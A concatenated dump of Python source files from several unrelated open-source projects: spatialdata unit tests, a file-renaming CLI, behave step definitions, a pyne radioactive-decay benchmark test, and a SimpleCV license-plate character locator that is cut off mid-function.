self.assertEqual(1.0*pascal, dim.pressureScale())
self.assertEqual(2.0*second, dim.timeScale())
self.assertEqual(1.0*kilogram/meter**3, dim.densityScale())
return
def test_densityScale(self):
dim = Nondimensional()
dim._configure()
dim.setDensityScale(2.0*kilogram/meter**3)
self.assertEqual(1.0*meter, dim.lengthScale())
self.assertEqual(1.0*pascal, dim.pressureScale())
self.assertEqual(1.0*second, dim.timeScale())
self.assertEqual(2.0*kilogram/meter**3, dim.densityScale())
return
def test_temperatureScale(self):
dim = Nondimensional()
dim._configure()
dim.setTemperatureScale(2.0*kelvin)
self.assertEqual(1.0*meter, dim.lengthScale())
self.assertEqual(1.0*pascal, dim.pressureScale())
self.assertEqual(1.0*second, dim.timeScale())
self.assertEqual(2.0*kelvin, dim.temperatureScale())
return
def test_nondimensionalize(self):
dim = Nondimensional()
dim._configure()
scale = 8.0*meter
value = 2.0*meter
valueE = 0.25
self.assertEqual(valueE, dim.nondimensionalize(value, scale))
return
def test_dimensionalize(self):
dim = Nondimensional()
dim._configure()
scale = 8.0*meter
value = 0.25
valueE = 2.0*meter
self.assertEqual(valueE, dim.dimensionalize(value, scale))
return
# End of file
```
#### File: pytests/utils/TestSpatialdataVersion.py
```python
import unittest
from spatialdata.utils.utils import SpatialdataVersion
class TestSpatialdataVersion(unittest.TestCase):
def test_isRelease(self):
isRelease = SpatialdataVersion.isRelease()
return
def test_version(self):
version = SpatialdataVersion.version()
# Check that version is of the form X.X.X
import re
match = re.search("[0-9]+\.[0-9]+\.[0-9]+", version)
self.failIf(match is None)
return
def test_gitVersion(self):
revision = SpatialdataVersion.gitRevision()
if SpatialdataVersion.isRelease():
self.assertEqual("unknown", revision)
else:
# Check that revision is of the form v2.1.3-16-g9323114
import re
match = re.search("v[0-9]+\.[0-9]+\.[0-9]+", revision)
if match is None:
match = re.search("v[0-9]+\.[0-9]+\.[0-9]+-[0-9]+-g[0-9,a-z]+", revision)
self.failIf(match is None)
return
def test_gitHash(self):
tag = SpatialdataVersion.gitHash()
if SpatialdataVersion.isRelease():
self.assertEqual("unknown", tag)
else:
# Check form of hash
import re
match = re.search("[0-9,a-z]+", tag)
self.failIf(match is None)
return
def test_gitDate(self):
value = SpatialdataVersion.gitDate()
if SpatialdataVersion.isRelease():
self.assertEqual("unknown", value)
else:
# Check form of datetime
import datetime
fields = value.split()
d = datetime.datetime.strptime(fields[0], "%Y-%m-%d")
t = datetime.datetime.strptime(fields[1], "%H:%M:%S")
return
def test_gitBranch(self):
branch = SpatialdataVersion.gitBranch()
if SpatialdataVersion.isRelease():
self.assertEqual("unknown", branch)
else:
self.failIf(len(branch) == 0)
return
def test_projVersion(self):
version = SpatialdataVersion.projVersion()
# Check that version is of the form XXX
import re
match = re.search("[0-9]+", version)
self.failIf(match is None)
return
# End of file
```
|
{
"source": "JedBurke/Rename-py",
"score": 3
}
|
#### File: arguments/profile/main.py
```python
import argparse
from ..argument_base import ArgumentBase
from .list_action import ListAction
class ProfileArgument(ArgumentBase):
def __init__(self, parser):
ArgumentBase.__init__(self)
self.parser = parser.add_parser(
"profile",
help="add, delete, list, and edit pattern profiles"
)
self.register(self.parser)
def args_entry(self, args):
return
def register(self, parser):
parser.add_argument(
"ls",
action=ListAction,
help="list profiles by name",
)
parser.add_argument(
"--get-profile",
help="return a profile by its name"
)
parser.add_argument(
"-a",
"--add",
help="add a profile"
)
parser.set_defaults(func=self.args_entry)
def get_subcommand(self):
return
```
#### File: Rename-py/arguments/user_init.py
```python
import argparse
import os
from helpers.user import UserHelpers
class InitializeUserConfig(argparse.Action):
"""docstring for InitializeUserConfig"""
def __init__(self, option_strings, dest, nargs=None, **kwargs):
if nargs is not None:
raise ValueError("nargs not allowed")
super(InitializeUserConfig, self).__init__(option_strings, dest, **kwargs)
def __call__(self, parser, namespace, values, option_string=None):
user_dir = UserHelpers.get_user_directory()
if user_dir.exists():
print(f"User directory already exists at:\n { user_dir }")
```
#### File: Rename-py/helpers/file.py
```python
import re
class FileHelpers():
"""
Converts a string of directories to a list using pre-defined
delimiters without checking the existence of said directories.
"""
def parse_directories(directory_str, pattern=None):
# Todo: Use the code from parse_extensions.
return
"""
Converts a string of extensions to a list using pre-defined
delimiters.
"""
def parse_extensions(extension_str, pattern=None):
WHITESPACE_SEPARATOR_REGEX = "\s?"
# Todo: Use constants.
PATH_SEPARATOR = ";"
EXTENSION_SEPARATOR = ","
pattern = f"[{PATH_SEPARATOR}{EXTENSION_SEPARATOR}{WHITESPACE_SEPARATOR_REGEX}]"
strip_regex = re.compile("^\s?$")
if pattern != None:
ext_pattern = pattern
ext_list = re.split(ext_pattern, extension_str)
for ext in ext_list:
if strip_regex.search(ext) != None:
ext_list.remove(ext)
# Todo: Remove duplicates.
strip_regex = None
return ext_list
"""
Opens and returns the contents of the file specified by the path in
"read" mode with the BOM set to UTF-8.
Returns:
String
"""
def read_file(path):
contents = None
with open(
path,
encoding="utf-8-sig",
mode="r"
) as file:
contents = file.read()
return contents
```
#### File: Rename-py/helpers/user.py
```python
from project_globals import Globals
import sys
import os
from os import path
from os.path import join
from pathlib import Path
"""
A collection of static functions which provide access to the user's
settings directory and profile paths.
The class is a catch-all one for directories pertaining to the user.
As such, the general profile directory is available from this class
as well.
"""
class UserHelpers:
"""
Gets the path to the directory which stores the user's profiles
and settings.
Returns:
Path-object
"""
def get_user_directory():
user_dir = path.expanduser(f"~/{Globals.USER_DATA_DIR_NAME}")
norm_user_dir = path.normpath(user_dir)
return Path(norm_user_dir)
"""
Gets the path to the file which stores the user's rename
profiles.
Returns:
Path-object
"""
def get_user_profiles_path():
user_profiles_path = path.join(
UserHelpers.get_user_directory(),
Globals.PROFILES_FILE_NAME
)
norm_user_profiles_path = path.normpath(user_profiles_path)
return Path(norm_user_profiles_path)
"""
Gets the path to the directory where the generally-available profiles
and settings are stored.
"""
def get_system_directory():
system_path = path.join(
os.getcwd(),
Globals.SYSTEM_DATA_DIR_NAME
)
return Path(system_path)
"""
Returns the path to the file which stores the generally-available
profiles.
Returns:
Path-object
"""
def get_profiles_path():
profiles_path = path.join(
UserHelpers.get_system_directory(),
Globals.PROFILES_FILE_NAME
)
norm_profiles_path = path.normpath(profiles_path)
return Path(norm_profiles_path)
"""
Returns the path to the user's log file.
Returns:
Path-object
"""
def get_user_log_path():
return
"""
Returns the path to the system's log file.
Returns:
Path-object
"""
def get_log_path():
return
```
#### File: Rename-py/modules/directory_manager1.py
```python
import unittest
import logging
from glob import glob
from pathlib import Path
class DirectoryManager(object):
"""
Represents a class which stores a list of directories while validating
which is valid and may be added.
"""
def __init__(self):
self.__directories = []
super(
DirectoryManager,
self
).__init__()
"""
Determines whether the path is a valid directory which may be added
to the the current instance.
Returns: Boolean
"""
def is_valid_directory(self, directory, directory_list):
if self.is_empty(directory) or self.exists(directory):
return False
elif not Path(directory).is_dir():
logging.info(f"\"{ directory }\" is not a directory.")
return False
else:
return True
"""
Determines whether the path is logically empty.
Returns: Boolean
"""
def is_empty(self, string):
if string == "" or string == None:
logging.info("Empty string passed")
return True
else:
return False
"""
Replaces the Windows-specific path separator with the Unix-like one.
Returns: String of the normalized path.
"""
def normalize_path(self, path):
return path.replace("\\", "/")
"""
Adds a directory to the directory manager instance.
"""
def add(self, directory):
directory_list = []
if isinstance(directory, list):
directory_list.extend(directory)
else:
directory_list.append(directory)
for path in directory_list:
for globbed_path in glob(path):
globbed_path = self.normalize_path(globbed_path)
if self.is_valid_directory(globbed_path, self.__directories):
self.__directories.append(globbed_path)
"""
Removes the specified path from the instance.
Returns: A boolean of whether all specified paths were removed.
"""
def remove(self, directory):
raise NotImplementedError
"""
Completely clears the instance.
Returns: A boolean if it was successful.
"""
def clear(self):
self.__directories.clear()
return True
"""
Returns a list of all the directories managed by the instance.
Returns: List
"""
def list(self):
return list(self.__directories)
def exists(self, directory):
if directory in self.__directories:
logging.info(f"Directory exists: { directory }")
return True
else:
return False
# class TestDirectoryManager(object):
# """docstring for TestDirectoryManager"""
# self.manager = None
# def setUp(self):
# self.manager = DirectoryManager()
# def test_add_directories(self):
# self.manager.add([
# "d://evrnet",
# "c://byteb",
# "c://hello",
# "c://ruby/*",
# "c://scripts/*"
# ])
# def tearDown(self):
# self.manager.clear();
# self.manager = None
```
#### File: Rename-py/modules/file_manager.py
```python
from modules.pathobject_manager import PathObjectManager
import os
from os import path
from os.path import join
from pathlib import Path
from glob import glob
import fnmatch
class FileManager(PathObjectManager):
def __init__(self):
super().__init__()
# self.whitelist = True
self.validation_function = self.is_valid_file
# @property
# def whitelist(self):
# return self._whitelist
# @whitelist.setter
# def whitelist(self, value):
# self._whitelist = value
def get_extension(self, path):
base = os.path.basename(path)
parts = os.path.splitext(base)
extension = ""
if len(parts) > 1:
extension = parts[len(parts) - 1][1:]
return extension
def add(self, directory, included_extensions="*", whitelist=True):
files = []
extensions = []
assert included_extensions != None
if isinstance(included_extensions, list):
extensions.extend(included_extensions)
else:
extensions.append(included_extensions)
if whitelist:
for extension in extensions:
temp_extension = ""
if not extension.startswith("*."):
temp_extension = "*." + extension
files.extend(glob(join(directory, temp_extension)))
else:
with os.scandir(directory) as it:
for entry in it:
if entry.is_file():
extension = self.get_extension(entry.path)
if not extension in extensions:
files.append(entry.path)
for file in files:
super().add(file)
def is_valid_file(self, path):
return True
```
#### File: Rename-py/modules/pathobject_manager.py
```python
import unittest
import logging
from glob import glob
from pathlib import Path
import os
from os import path
class PathObjectManager:
def __init__(self):
self.__paths = []
self.validation_function = None
"""
Determines whether the path is a valid directory which may be added
to the the current instance.
Returns:
Boolean
"""
def is_valid_directory(self, directory, directory_list):
if self.is_empty(directory) or self.exists(directory):
return False
elif not Path(directory).is_dir():
logging.info(f"\"{ directory }\" is not a directory.")
return False
else:
return True
"""
Determines whether the string is logically empty.
Returns:
Boolean
"""
def is_empty(self, string):
if string == "" or string == None:
logging.info("Empty string passed")
return True
else:
return False
"""
Replaces the Windows-specific path separator with the Unix-like one.
Returns:
String of the normalized path.
"""
def normalize_path(self, path):
return path.replace("\\", "/")
"""
Adds a path to the manager instance.
"""
def add(self, path):
paths_list = []
# Tests if the passed path is a list. If it is, the paths_list
# will be extended with it.
if isinstance(path, list):
paths_list.extend(path)
else:
paths_list.append(path)
# Iterate through each item in the paths list.
for path in paths_list:
path = os.path.normpath(path)
valid_path = False
if self.validation_function is not None:
valid_path = self.validation_function(path)
else:
valid_path = True
self.__paths.append(path)
"""
Removes the specified path from the instance.
Returns:
A boolean of whether all specified paths were removed.
"""
def remove(self, path):
raise NotImplementedError
"""
Completely clears the instance of its paths.
Returns:
A boolean if it was successful.
"""
def clear(self):
self.__paths.clear()
return True
"""
Returns a list of all the directories managed by the instance.
Returns:
List
"""
def list(self):
return list(self.__paths)
def exists(self, directory):
if directory in self.__paths:
logging.info(f"Directory exists: { directory }")
return True
else:
return False
```
|
{
"source": "JedCainglet/py-behave-example",
"score": 3
}
|
#### File: features/steps/tutorial.py
```python
from behave import *
# Feature: showing off behave
# Scenario: run a simple test
@given('we have behave installed')
def step_impl(context):
pass
@when('we implement a test')
def step_impl(context):
assert True is not False
@then('behave will test it for us!')
def step_impl(context):
assert context.failed is False
# Scenario: explaining behave
@given('we put the system in a known state')
def step_impl(context):
pass
@when('we take key actions the user (or external system) performs')
def step_impl(context):
assert True is not False
@then('we observe outcomes')
def step_impl(context):
assert context.failed is False
# Scenario Outline: Blenders
@given('I put Red Tree Frog in a blender')
def step_impl(context):
pass
@when('I switch the blender on')
def step_impl(context):
assert True is not False
@then('it should transform into mush')
def step_impl(context):
assert context.failed is False
@given('I put iPhone in a blender')
def step_impl(context):
pass
# NOTE: already defined
# @when('I switch the blender on')
# def step_impl(context):
# assert True is not False
@then('it should transform into toxic waste')
def step_impl(context):
assert context.failed is False
@given('I put Galaxy Nexus in a blender')
def step_impl(context):
pass
# NOTE: already defined
# @when('I switch the blender on')
# def step_impl(context):
# assert True is not False
# NOTE: already defined
# @then('it should transform into toxic waste')
# def step_impl(context):
# assert context.failed is False
# Scenario: some scenario
@given('a sample text loaded into the frobulator')
def step_impl(context):
print(context.text)
pass
@when('we activate the frobulator')
def step_impl(context):
assert True is not False
@then('we will find it similar to English')
def step_impl(context):
assert context.failed is False
# Scenario: another some scenario
@given('a set of specific users')
def step_impl(context):
for row in context.table:
print(row['name'], "--", row['department'])
@when('we count the number of people in each department')
def step_impl(context):
assert True is not False
@then('we will find two people in "<NAME>"')
def step_impl(context):
assert context.failed is False
@then('we will find one person in "<NAME>"')
def step_impl(context):
assert context.failed is False
# Scenario series: look up book
@given('I search for a valid book')
def step_impl(context):
context.response = "success"
pass
@given('I search for an invalid book')
def step_impl(context):
context.response = "failure"
pass
@then('the result page will include "{text}"')
def step_impl(context, text):
if text not in context.response:
raise Exception(f"expected '{context.response}', found '{text}' instead")
```
|
{
"source": "jedch/pyne",
"score": 2
}
|
#### File: pyne/tests/test_decay.py
```python
from __future__ import print_function, unicode_literals
import os
import sys
import json
import warnings
if sys.version_info[0] >= 3:
from urllib.request import urlretrieve
from functools import lru_cache
else:
from urllib import urlretrieve
lru_cache = lambda *args, **kwargs: (lambda f: f)
import nose
from nose.tools import assert_equal, assert_not_equal, assert_raises, raises, \
assert_in, assert_true, assert_less
import numpy as np
import tables as tb
from numpy.testing import assert_array_equal, assert_array_almost_equal
from pyne.utils import QAWarning
warnings.simplefilter("ignore", QAWarning)
from pyne import nucname
from pyne import data
from pyne import origen22
from pyne.material import Material, MaterialLibrary
# import decay gen
srcdir = os.path.join(os.path.dirname(__file__), '..', 'src')
srcdir = os.path.abspath(srcdir)
sys.path.insert(0, srcdir)
import decaygen
h5ver = tuple(map(int, tb.hdf5_version.split('-', 1)[0].split('.')))
if h5ver == (1, 8, 13):
H5NAME = 'origen-benchmark-hdf5-1.8.13.h5'
else:
H5NAME = 'origen-benchmark-hdf5-1.8.14.h5'
MATS = None
O2HLS = None # Origen Half-lives
def setup():
global MATS, O2HLS
o2benchurl = 'https://github.com/pyne/data/raw/master/' + H5NAME
if not os.path.exists(H5NAME):
sys.stderr.write("\nDownloading " + o2benchurl + ": ")
sys.stderr.flush()
urlretrieve(o2benchurl, H5NAME)
sys.stderr.write("done.\n")
sys.stderr.flush()
MATS = MaterialLibrary(H5NAME, "/materials")
with open('o2hls.json', 'r') as f:
O2HLS = json.load(f)
O2HLS = {int(nuc): v for nuc, v in O2HLS.items()}
METASTABLE_BLACKLIST = {
771940001, # have 2+ metastables that ORIGEN lumps together, or
340830001, # ...
350830000, # decay to metastables without reason.
340830000, # ...
481170000, # ...
501130001, # missing branch in origen
}
#
# helper functions
#
def t9_half_life(nuc):
return O2HLS.get(nuc, None)
@lru_cache()
def hl_relerr(nuc):
"""Half-life relative error."""
dhl = data.half_life(nuc) or np.inf
ohl = t9_half_life(nuc) or np.inf
if np.isinf(ohl) and np.isinf(dhl):
return 0.0
hlre = np.abs(ohl - dhl) * 2 / (ohl + dhl)
return np.inf if np.isnan(hlre) else hlre
def pivot_mat_keys():
"""This puts the material keys into a dict mapping nuclides to the data
set names (eg 'origen_922350000_3'). This filters out any data sets that
contain high relative errors in the half-lives. It also filters out
species for which Origen has weird metastable behavior that seems
unphysical.
"""
nuc_keys = {}
for key in MATS.keys():
_, nuc, t = key.split('_')
nuc = int(nuc)
if nuc in METASTABLE_BLACKLIST:
continue
chains = decaygen.genchains([(nuc,)])
maxrelerr = max([max(list(map(hl_relerr, c))) for c in chains])
if maxrelerr > 0.1:
continue
t = int(t)
if nuc not in nuc_keys:
nuc_keys[nuc] = []
nuc_keys[nuc].append(key)
sfunc = lambda x: int(x.rsplit('_', 1)[1])
for keys in nuc_keys.values():
keys.sort(key=sfunc)
return nuc_keys
def matdiff(x, y, threshold=1e-3):
"""Takes the difference between to materials, returns diff dict,
the maximum relative error, the child which has the max difference,
that child's mass, and the mass-weighted error.
Skips nuclides that are not in both materials.
"""
diff = {}
maxrelerr = -1.0
child = None
childmass = None
weightederr = None
for nuc in x:
if nuc not in y:
continue
xcomp = x[nuc]
ycomp = y[nuc]
if (xcomp <= threshold) and (ycomp <= threshold):
continue
diff[nuc] = d = np.abs(xcomp - ycomp) * (2 / (xcomp + ycomp))
if d > maxrelerr:
maxrelerr = d
child = nuc
childmass = max(xcomp, ycomp)
weightederr = childmass * maxrelerr
return diff, maxrelerr, child, childmass, weightederr
def mat_err_compare(nuc_keys, threshold=1e-3):
"""This returns a generator that compares the origen decayed
material to the pyne material decay. The comparison stores:
* the material key, matkey
* the parent nuclide, nuc
* the decay time, t
* the maximum relative error over all nuclides, relerr
* the nuclide with the maximum relative error, child
* The mass of the child, childmass
* the child's mass weighted relative error, weightederr
Note that this also filters by when Origen itself has messed up by
gaining or losing too much mass (1%). Furthermore, the maximum relative
error is only computed for species that have a certain threshold
unit mass (default 1e-3).
"""
for nuc, keys in list(nuc_keys.items()):
fresh = MATS[keys[0]]
for matkey in keys[1:]:
mat = MATS[matkey]
if (mat.mass < 0.99) or (mat.mass > 1.1):
continue # Origen lost too much mass
t = mat.metadata['decay_time']
decmat = fresh.decay(t)
row = matdiff(mat, decmat)
if row[1] < 0.0 and row[2] is None:
continue # uncomparable materials, no common species
row = (matkey, nuc, t) + row
yield row
#
# Tests
#
def check_materr(row):
maxrelerr = row[4]
if maxrelerr < 0.01:
return
weightederr = row[7]
assert_less(weightederr, 0.1)
def test_benchmark():
nuc_keys = pivot_mat_keys()
for row in mat_err_compare(nuc_keys):
yield check_materr, row
if __name__ == "__main__":
nose.runmodule()
```
|
{
"source": "jedcua/spear",
"score": 3
}
|
#### File: spear/LPR/charLocate.py
```python
import SimpleCV
import texttable
import time
import copy
from termcolor import colored
def findChar(input_image,
MAX_Y_GAP=7, MAX_WIDTH_GAP=7, MAX_HEIGHT_GAP=5, MAX_AR_GAP=0.078,
MIN_ASPECT_RATIO=0.45, MAX_ASPECT_RATIO=0.77,
MIN_SP_ASPECT_RATIO=0.08, MAX_SP_ASPECT_RATIO=0.245,
MIN_SP2_ASPECT_RATIO=0.31, MAX_SP2_ASPECT_RATIO=0.35,
MIN_AREA=900, MAX_AREA=float('inf'),
MIN_COUNT=3, MAX_COUNT=7, MAX_WIDTH_MULTIPLE=10,
perform_unit_test=False, right_click_save=False):
#NOTE: MAX_Y_GAP=10
"""
Method:
Takes a binarized SimpleCV.Image, determines location of the
Alphanumeric character, and returns a list of SimpleCV.FeatureSet
containing the potential locations of the Alphanumeric Character.
Parameters:
Filtering individual Non-character Blobs:
minAR - Minimum Width/Height of a Blob.
maxAR - Maximum Width/Height of a Blob.
minArea - Minimum rectangular area of a Blob.
maxArea - Maximum rectangular area of a Blob.
Grouping Blobs by attribute:
maxYGap - Highest allowed Y Pos gap between Blobs for grouping.
maxWidthGap - Highest allowed Width gap between Blobs for grouping.
maxHeightGap - Highest allowed Height gap between Blobs for grouping.
Filtering Blob groups by their attribute:
minCount - Minimum allowed number of Blobs in a list.
maxCount - Maximum allowed number of Blobs in a list.
maxWidthMultiple - Farthest width x N distance for an actual License Plate.
Guessing missing character Blobs:
guessMissing - Perform interpolation and extrapolation for missing Blobs.
centerPos - Location of Center relative to Image's width x thisValue (0:Left, 1:Right)
Debugging:
performUnitTest - Show visual feedback for debugging.
Returns:
List of SimpleCV.FeatureSet containing Blobs bounding the Alphanumeric Character.
None is no FeatureSets remained.
"""
if perform_unit_test: input_image.show()
raw_blobs = input_image.findBlobs()
#Exit function if no blobs found
if raw_blobs is None:
return None
filtered_blobs = filter(lambda blob: MIN_ASPECT_RATIO <= (float(blob.width()) / float(blob.height())) <= MAX_ASPECT_RATIO, raw_blobs)
filtered_blobs = filter(lambda blob: MIN_AREA < (blob.width() * blob.height()) < MAX_AREA, filtered_blobs)
special_blobs = filter(lambda blob: MIN_SP_ASPECT_RATIO <= (float(blob.width()) / float(blob.height())) <= MAX_SP_ASPECT_RATIO, raw_blobs)
if len(special_blobs):
special_blobs = _monkeyPatchBlobs(special_blobs, input_image)
filtered_blobs.extend(special_blobs)
special_blobs2 = filter(lambda blob: MIN_SP2_ASPECT_RATIO <= (float(blob.width()) / float(blob.height())) <= MAX_SP2_ASPECT_RATIO, raw_blobs)
if len(special_blobs2):
special_blobs2 = _monkeyPatchBlobs(special_blobs2, input_image, MIN_AREA_FILLED=35)
filtered_blobs.extend(special_blobs2)
special_blobs.extend(special_blobs2)
#Exit function if no blobs remain
if len(filtered_blobs) == 0:
return None
list_of_blob_lists = [filtered_blobs]
list_of_blob_lists = _regroupListOfList(list_of_blob_lists, _sortByHeight, _heightRelativeGapComparator, MAX_HEIGHT_GAP)
list_of_blob_lists = _regroupListOfList(list_of_blob_lists, _sortByWidth, _widthRelativeGapComparator, MAX_WIDTH_GAP)
list_of_blob_lists = _regroupListOfList(list_of_blob_lists, _sortByAspectRatio, _aspectRatioRelativeGapComparator, MAX_AR_GAP)
list_of_blob_lists = _regroupListOfList(list_of_blob_lists, _sortByY, _yRelativeGapComparator, MAX_Y_GAP)
list_of_char_lists = _filterAlphanumericBlobs(list_of_blob_lists, MIN_COUNT, MAX_COUNT, MAX_WIDTH_MULTIPLE)
if len(list_of_char_lists) == 0:
return None
final_char_lists, blacklisted_blobs_list = _removeBlacklistCharacters(list_of_char_lists, input_image,
blacklist_reader, threshold=40)
final_char_lists, blacklisted_blobs_list2 = _removeBlacklistCharacters(final_char_lists, input_image,
blacklist2_reader, threshold=85)
blacklisted_blobs_list.extend(blacklisted_blobs_list2)
#final_char_lists = list_of_char_lists[:]
if perform_unit_test:
#_animatedDisplayBlobGroups([raw_blobs], input_image, rect_color=(0, 0, 255), save_on_right_click=right_click_save)
#_animatedDisplayBlobGroups([filtered_blobs], input_image, rect_color=(255, 255, 0), save_on_right_click=right_click_save)
#_animatedDisplayBlobGroups([special_blobs], input_image, rect_color=(0, 255, 255), save_on_right_click=right_click_save)
#_animatedDisplayBlobGroups(list_of_blob_lists, input_image, rect_color=(255, 0, 0), save_on_right_click=right_click_save)
#_animatedDisplayBlobGroups(list_of_char_lists, input_image, rect_color=(0, 255, 0), save_on_right_click=right_click_save)
#_animatedDisplayBlobGroups(blacklisted_blobs_list, input_image, rect_color=(130, 70, 0), save_on_right_click=right_click_save)
_animatedDisplayBlobGroups(final_char_lists, input_image, rect_color=(255, 0, 255), save_on_right_click=right_click_save)
if len(final_char_lists) == 0:
return None
else:
return final_char_lists
def _printBlobListData(inp_blob_list):
if len(inp_blob_list) == 0:
return None
table = texttable.Texttable()
table.set_deco(texttable.Texttable.HEADER)
table.set_cols_align(["r","r","r","r","r","r","r","r"])
table.set_cols_dtype(['i','i','i','i','f','i','d','f'])
table_label = ["X","Y","W","H","Aspect Ratio","RectArea","BlobArea","Rect/Blob"]
rows = [table_label]
for blob in inp_blob_list:
aspect_ratio = float(blob.width()) / float(blob.height())
rect_area = int(blob.width() * blob.height())
rows.append([blob.x, blob.y, blob.width(), blob.height(),
aspect_ratio, rect_area, blob.area(),
float(rect_area)/blob.area()])
table.add_rows(rows)
print table.draw()
sum_y, sum_w, sum_h = float(0),float(0),float(0)
num_item = len(inp_blob_list)
for blob in inp_blob_list:
sum_y += blob.y
sum_w += blob.width()
sum_h += blob.height()
#Get average statistics
ave_y, ave_w, ave_h = sum_y / num_item, sum_w / num_item, sum_h / num_item
print "_________________________"
print "Ave Y Pos : " + str(ave_y)
print "Ave Width : " + str(ave_w)
print "Ave Height: " + str(ave_h)
print "Ave AR : " + str(ave_w/ave_h)
print "Num Blobs : " + str(len(inp_blob_list))
print "_________________________"
def _animatedDisplayBlobGroups(this_list_of_list, target_img, rect_color=(255,0,0), text_color=(255, 0, 0),
retain=False, save_on_right_click=False):
display = SimpleCV.Display((target_img.width, target_img.height), title="SPEAR")
print "Number of Blob Groups:" + str(len(this_list_of_list))
for this_list in this_list_of_list:
target_img = _markBlobsWithRectangles(this_list, target_img, rect_color, text_color, retain)
print "\n"
_printBlobListData(sorted(this_list, key = lambda blob: blob.x))
target_img.save(display)
while not display.isDone():
if display.mouseLeft:
display.done = True
#Save all char blobs if right_click_save=True
if save_on_right_click and display.mouseRight:
for index, this_blob in enumerate(this_list):
this_blob.blobImage().save(str(index) + ".jpg")
print str(index + 1) + " Images saved."
time.sleep(0.2)
time.sleep(0.1)
display.done = False
def _markBlobsWithRectangles(input_blob_list, target_img, rect_color=(255, 0, 0),
text_color=(255, 255, 255), retain_prev=False):
#May cause warnings if removing a nonexistent Drawing Layer. Just ignore ;)
if retain_prev == False:
target_img.removeDrawingLayer()
for blob in input_blob_list:
x1, y1 = blob.minX(), blob.minY()
x2, y2 = blob.maxX(), blob.maxY()
target_img.dl().rectangle2pts((x1, y1), (x2, y2), rect_color, 2, False)
target_img.dl().text(str(blob.x) + "," + str(blob.y), (x1, y1 - 15), text_color)
return target_img
def _regroupListOfList(inp_list_of_list, sort_function, compare_function, COMPARATOR_PARAMETER):
final_list_of_list = []
for this_list in inp_list_of_list:
temp_list_of_list = _groupBlobListWithCategory(this_list, sort_function, compare_function, COMPARATOR_PARAMETER)
final_list_of_list.extend(temp_list_of_list)
return final_list_of_list
def _groupBlobListWithCategory(inp_blob_list, sort_function, compare_function, COMPARATOR_PARAMETER):
#Sort according to desired category
inp_blob_list = sort_function(inp_blob_list)
list_of_blob_lists = []
this_feature_set = SimpleCV.FeatureSet()
#Off by 1 bug ;)
this_feature_set.append(inp_blob_list[0])
#Segregate blob list according to specified condition in compareFunction
for blob_index in range(1, len(inp_blob_list)):
prev_blob = inp_blob_list[blob_index - 1]
current_blob = inp_blob_list[blob_index]
#If yes, put it on the same list
if (compare_function(current_blob, prev_blob, COMPARATOR_PARAMETER)):
this_feature_set.append(current_blob)
#if no, put it on a new list
else:
list_of_blob_lists.append(this_feature_set)
this_feature_set = SimpleCV.FeatureSet()
this_feature_set.append(current_blob)
#Last thisFeatureSet won't be appended. So append it ;)
list_of_blob_lists.append(this_feature_set)
return list_of_blob_lists
def _sortByY(this_list):
return sorted(this_list, key = lambda blob: blob.y)
def _yRelativeGapComparator(this_current_blob, this_prev_blob, MAX_Y_GAP):
if ((this_current_blob.y - this_prev_blob.y) <= MAX_Y_GAP):
return True
else:
return False
def _sortByWidth(this_list):
sorted_list = sorted(this_list, key = lambda blob: blob.width())
return sorted_list
def _widthRelativeGapComparator(this_current_blob, this_prev_blob, MAX_WIDTH_GAP):
if ((this_current_blob.width() - this_prev_blob.width()) <= MAX_WIDTH_GAP):
return True
else:
return False
def _sortByHeight(this_list):
sorted_list = sorted(this_list, key = lambda blob: blob.height())
return sorted_list
def _heightRelativeGapComparator(this_current_blob, this_prev_blob, MAX_HEIGHT_GAP):
if ((this_current_blob.height() - this_prev_blob.height()) <= MAX_HEIGHT_GAP):
return True
else:
return False
def _sortByAspectRatio(this_list):
sorted_list = sorted(this_list, key = lambda blob: float(blob.width()) / blob.height())
return sorted_list
def _aspectRatioRelativeGapComparator(this_current_blob, this_prev_blob, MAX_AR_GAP):
current_blob_AR = float(this_current_blob.width()) / this_current_blob.height()
prev_blob_AR = float(this_prev_blob.width()) / this_prev_blob.height()
if ((current_blob_AR - prev_blob_AR) <= MAX_AR_GAP):
return True
else:
return False
def _filterAlphanumericBlobs(inp_list_of_lists, MIN_COUNT, MAX_COUNT, MAX_WIDTH_MULTIPLE):
out_list_of_lists = []
for this_list in inp_list_of_lists:
if (MIN_COUNT <= len(this_list) <= MAX_COUNT):
this_list = this_list.sortX()
#Get edges and average width
first_blob_left_edge = this_list[0].minX()
last_blob_right_edge = this_list[-1].maxX()
sum_width = float(0)
for this_blob in this_list:
sum_width += this_blob.width()
ave_width = sum_width / len(this_list)
if ((last_blob_right_edge - first_blob_left_edge) <= (ave_width * MAX_WIDTH_MULTIPLE)):
out_list_of_lists.append(this_list)
return out_list_of_lists
def _clip(val, min_val, max_val):
if val < min_val:
val = min_val
elif val > max_val:
val = max_val
return val
def _monkeyPatchBlobs(input_blobs, input_image, MIN_AREA_FILLED=45):
out_blobs = SimpleCV.FeatureSet()
for blob in input_blobs:
new_blob = _overrideBlob(blob, input_image, MIN_AREA_FILLED)
out_blobs.append(new_blob)
return out_blobs
def _overrideBlob(input_blob, input_image, MIN_AREA_FILLED, DESIRED_AR=0.59):
x_boundL, x_boundU = 0, input_image.width-1
orig_x, orig_y = input_blob.x, input_blob.y
orig_width = input_blob.width()
orig_height = input_blob.height()
#Check first if blob's shape is rectangular
perc_filled = (float(input_blob.area()) / (orig_width * orig_height)) * 100
if perc_filled < MIN_AREA_FILLED:
return input_blob
print colored("Special Blob : (%i, %i) : %f filled" %(orig_x, orig_y, perc_filled),
color='yellow', on_color='on_blue', attrs=['bold'])
#if not input_blob.isRectangle(0.08):
# return input_blob
new_width = int(DESIRED_AR * orig_height)
new_minX = _clip(orig_x - (new_width / 2), x_boundL, x_boundU)
new_maxX = _clip(orig_x + (new_width / 2), x_boundL, x_boundU)
new_blobMask = input_image[int(new_minX):int(new_maxX), orig_y:orig_y+orig_height]
#Define new method and attribute for width
blob = copy.copy(input_blob)
blob.width = lambda : new_width
blob.minX = lambda : new_minX
blob.maxX = lambda : new_maxX
blob.blobImage = lambda : new_blobMask
blob.blobMask = lambda : new_blobMask
return blob
#-------------------------------------------------------------------------------------------
import charRecog
import os
prog_path = os.path.dirname(os.path.realpath(__file__))
blacklist_path = prog_path + "/template/blacklist/"
blacklist_reader = charRecog.CharReader(blacklist_path)
blacklist2_path = prog_path + "/template/blacklist2/"
blacklist2_reader = charRecog.CharReader(blacklist2_path)
def _removeBlacklistCharacters(input_blobs, input_image, charReader, threshold, debug=False):
retained_list = []
removed_list = []
for blob in input_blobs[0]:
x1, y1 = blob.minX(), blob.minY()
x2, y2 = blob.maxX(), blob.maxY()
otsu_char = input_image[x1:x2, y1:y2]
